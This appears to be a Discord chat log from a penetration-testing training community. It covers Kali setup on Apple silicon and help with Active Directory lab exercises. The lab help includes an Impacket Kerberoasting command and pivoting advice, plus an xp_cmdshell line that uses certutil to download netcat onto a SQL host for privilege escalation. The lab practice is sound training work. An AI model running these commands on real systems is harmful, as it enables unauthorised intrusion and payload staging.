I PINGED THE WRONG PERSON DAMMIT

https://tenor.com/view/dave-lindenbaum-clickfunnels-gif-18256092

Damn I had time to type on mobile before you nerds pinged

donk

my screen shows you were last

ty cloud our savior and lord

https://tenor.com/view/hammering-plankton-spongebob-squarepants-bashing-battering-gif-25583117

#general

Read and follow #welcome to access it

@heavy edge here's ur friend

whyd you add me

#thanks I would appreciate if I can learn more

okay but

why did

you specifically

add me

This isn't the channel for conversation

If they wanna talk in general they can follow #welcome to access more channels

I want to be a part of your journey & Success stories

My opinion is already negative due to crypto shill

But I can overlook that

I suggest reading #rules as well

Generally people don't respond positive to random friend requests

At best they ignore, at worst they call you every name under the sun

If you want to learn you can look at HTB Academy but I don't think there's much that'll interest you if you're only into the crypto side

hello guys,

Active Directory module kerberos section

when i use the domain user forend, wley my command not working
output connection refused

./GetUserSPNs.py -dc-ip 10.129.174.112 INLANEFREIGHT.LOCAL/forend
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[-] [Errno 111] Connection refused

well, it says connection refused so check your networking stuff

ensure target is up etc

do the basic steps first

Connection refused:
Target said "nuh-uh"

I can access the machine

I'm already connected via ssh

are u sure the ip is the correct ip for the dc

not sure but check the /etc/hosts and make sure there's an entry for INLANEFREIGHT.LOCAL

pixelrazer is right, he needs the correct DC IP in there

I'd go with @wanton idol 's suggestion and double-check the DC IP

okey

true i fix it

not working

my hosts file

172.16.5.5 INLANEFREIGHT.LOCAL
10.129.174.112 INLANEFREIGHT.LOCAL

you have the hostname pointed to 2 separate ip addresses, don't you think that's going to cause some conflict? the hostnames should be unique for the ip

It's true but I tried it one by one and it didn't work

welp that's why i said you gotta troubleshoot the basics. make sure all your targets, hosts, etc, EVERYTHING is correct. it all has to be right

okey

hmmm remove both ip from the hosts file and ping 172.16.5.5 and see if u can reach it

I mean it sounds like they haven't properly pivoted to the network

^

The module does have a parrot host to run the relative linux commands

true

you aren't going to reach 172.16.5.5 with just the vpn connection

I believe it exists on 172.16.5.225

The creds are given in one of the sections

Otherwise you can do pivoting to access the internal network

yupp

Note: the pivoting module is a stated pre-requisite module for this one

okey thanks i use the pivot

THE PIVOT

Then you'll need to use the methods of connecting to the internal network your pivot method requires

I.e. proxychains

Or a method may require the use of setting up a route

worked

thanks

I have a job interview tomorrow, I'm a little stressed and trying to learn a lot.

Then take a break if you have to

@fathom pendant I don’t know which image to download for Mac m chips…

M chips would be ARM afaik

A simple Google would answer :)

It’s not quite popping up… 🫤

I just googled "are m chips arm"

You found the iso?

?

Yes.
But do you see the kali wmware iso for arm?
Hard to find.

I’m thinking that’s why he made that custom image. 🤷🏽‍♂️

I think their arm ones are on qemu

That’s why I’m using the custom image…

But you're best off going to the kali discord and asking

https://www.kali.org/get-kali/#kali-installer-images

Doesn't look like they have a pre-built one for m1/m2

But you can download the installer

<@&861185840277487616>

That’s to put it on bare metal, right?
I just want the iso for VMware.

You can use installer images in a hypervisor

Much like you can use an iso for amd64 devices

You just select the installer image to mount

¯_(ツ)_/¯

That means I’d have to download another program other than VMware?

No?

VMware is a hypervisor

A hypervisor is virtualization software

So is virtual box?
But they have different download images.

You can use an iso on Virtualbox and vmware

I’d have to get a “UTM” virtual machine.

Much like you can use the .img file

I’ll try it.
Let’s see if the installer works on VMware.

¯_(ツ)_/¯

.ova is just a pre-made virtualbox image

.iso is the disk file

The installer image is for direct access to hardware.
The virtual machines are different depending on which you are running.
I’m running VMware.
The VMware image is not for arm.

Like I said, take it up with offsec/kali

I know several people have had no problems virtualizing kali on a mac

This is why I’m using the custom image @fathom pendant lol.
I wish I knew how to make them. Idk…
It’s ok for now…

On Mchips?

We haven’t even figured it out amongst ourselves just now. 🤷🏽‍♂️

Yea

https://www.kali.org/docs/virtualization/install-vmware-silicon-host/

official documentation says to use the installer image ¯_(ツ)_/¯

Maybe it was custom…
As we can see, they don’t really have pre-made images.
The Kali docs even state that’s there are issues running Kali on Mchips.

Use the link I posted

You goon

It lists detailed steps

Not custom

I’m trying it…

bumping again
"AD Enumeration & Attacks - Skills Assessment Part II" Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host
Did anyone have trouble with uploading files to the SQL01 host? tryign to Priv esc on it and tryign to upload files, but seems like an issue. certutil, IWR, mounting share, etc failing. thanks for any help in advance

No troubles here

what command you used? @fathom pendant

Certutil

for skills assessment ii on ad attacks, why does sharphound give a different result than bloodhound.py

@fathom pendant sorry, getting nothing with certutil

¯_(ツ)_/¯

Remember the target can't directly access your machine

So you need to get it to the jump host then transfer

already on jump host

with files prepped and webserver/share up

something not right

try meterpreter

Make sure you use the right ip

172 can't connect to 10.129

(At least they don't share any other common interface)

Also make sure you enable_xp_cmdshell

IP is good and xp_cmdshell also enabled

reset the environment and try again then maybe ¯_(ツ)_/¯

xp_cmdshell 'certutil -urlcache -split -f "http://172.16.7.240:8000/nc64.exe" "C:\tmp\nc64.exe"'

already reset x3

Kali Purple looks cool… 🙂

What's C:\tmp?

i made a dir

also used other dir as well

like C:\Users\Public

C:\Windows\temp is the default temp

Are you getting any messages in your hosted web server?

i even see it hit my server, but looks like it times out

Weird

Try changing vpn regions and trying again with a new target

It sounds weird

You using pwnbox or your own vm?
I get weird behavior when I use my own vm sometimes.

As it shouldn't affect internal machines